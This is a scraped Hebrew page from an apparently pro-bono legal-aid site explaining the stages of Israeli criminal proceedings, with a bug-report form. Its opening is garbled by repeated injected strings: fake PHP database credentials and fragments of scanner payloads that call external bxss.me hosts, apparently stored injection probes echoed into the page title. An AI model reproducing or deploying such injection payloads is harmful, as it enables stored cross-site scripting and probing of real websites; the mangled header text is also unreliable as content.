$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_u $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> ?>; $db_name = "1"; ?>b_name = "1"; ?>esb9769.bxss.me.')[3].to_s)+'"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?>_pass = "g00dPa$$w0rD"; $db_name = "1"; ?>; ?>'hiteptjlxcjea2c2f9.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> הסתבכת בפלילים? עורך דין פלילי מנוסה לשירותך פרובונו
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
יצירת קשר
חיפוש באתר
מאמרים אחרונים

הסתבכת בפלילים? עורך דין פלילי מנוסה לשירותך!

תאריך: 10/10/2010 00:16   מחבר: מערכת פרובונו

החוק בישראל קובע כי מעשים מסויימים הינם מנוגדים לחוק וחל איסור על ביצועם. החוק אף קובע את חומרת העונש שיוטל על מי שביצע עבירה ועשה מעשה שנאסר על פי חוק.

ישנן 3 דרגות חומרה לעבירות פליליות לפי החוק בישראל:


שלבי ההליך הפלילי

שלב א': חקירה משטרתית

כיוון שעבירה פלילית מוגדרת כעבירה על חוקי המדינה, ולא כסכסוך בין אזרחים (משפט אזרחי), הליך פלילי מוגש ומנוהל על ידי המדינה. מרגע שהוגשה במשטרה תלונה על ביצוע עבירה פלילית, נפתח הליך פלילי. לפני שיעמוד הנאשם בעבירה מול בית המשפט, תבצע המשטרה חקירה מקיפה לאיסוף ראיות כנגד הנאשם. החקירה תכלול את חקירת הנאשם עצמו , חקירה של עדים ומציאת הוכחות שונות שאכן בוצעה העבירה על ידי הנאשם.

שלב ב': הגשת כתב אישום או סגירת התיק

לאחר החקירה יחליט פרקליט המדינה אם להגיש כתב אישום כנגד הנאשם או לסגור את התיק.  פרקליט המדינה יכול להחליט על סגירת התיק מחוסר ראיות, מחוסר אשמה או מחוסר עניין לציבור. חשוב לדעת, כי אם ייסגר התיק מחוסר אשמה – יימחק הרישום הפלילי מתיקו של הנאשם. אולם במקרה שבו נסגר התיק מחוסר ראיות, יישאר רישום פלילי במשטרה, דבר שעשוי להשפיע על אישומים עתידיים כנגד הנאשם.  

שלב ג': שימוע


אם החליט הפרקליט להגיש כתב אישום, ייקבע שימוע, שהינו הליך מקדים למשפט, ובו תינתן לנאשם הזדמנות להשמיע דברו וטיעוניו כנגד האשם שהובע נגדו. השימוע נועד לברר את ההוכחות הקיימות לביצוע העבירה, ועשוי במקרים מסויימים להשפיע על סעיפי האישום.  

שלב ד': משפט בפני ערכאות

המשפט הינו ההליך העיקרי להוכחת אשמתו או חפותו של הנאשם וכן לקביעת פסק הדין. במשפט פלילי, ינסה הפרקליט המייצג את המדינה להוכיח כי הנאשם אשם בעבירה המיוחסת לו 'מעל לכל ספק סביר'.  

שלילת חירותו של אדם היא החלטה כבדת משקל, במידה וניתן יהיה להוכיח כי קיים ספק סביר לאשמתו של הנאשם – יזוכה הנאשם.

אתר זה בא לאפשר לכל אדם שהואשם בפלילים, ואין בידו האמצעים הדרושים לשלם עבור יצוג משפטי, ליצור קשר עם עורכי דין המתמחים בתחום והמספקים סיוע משפטי בהתנדבות וללא תשלום. אנא פנה אלינו באמצעות טופס יצירת הקשר באתר ואנו ננתב את פנייתך אל עורך דין פלילי מנוסה, שיוכל לייעץ ולייצג אותך.

שימו לב כי החוק בישראל מאפשר לאדם אשר הואשם בפלילים והנו מחוסר אמצעים (לפי אמות מידה ידועות), לפנות ולקבל יצוג משפטי באמצעות הסנגוריה הציבורית.

קיראו מידע ומאמרים נוספים באתר
מחיקת רישום פלילי - דרכים לביטול, משמעות והשלכות - עורך דין פלילי פרובונו לשירותך - קבלת סיוע משפטי במחיקת רישום פלילי ומידע מפורט, במאמר המלא...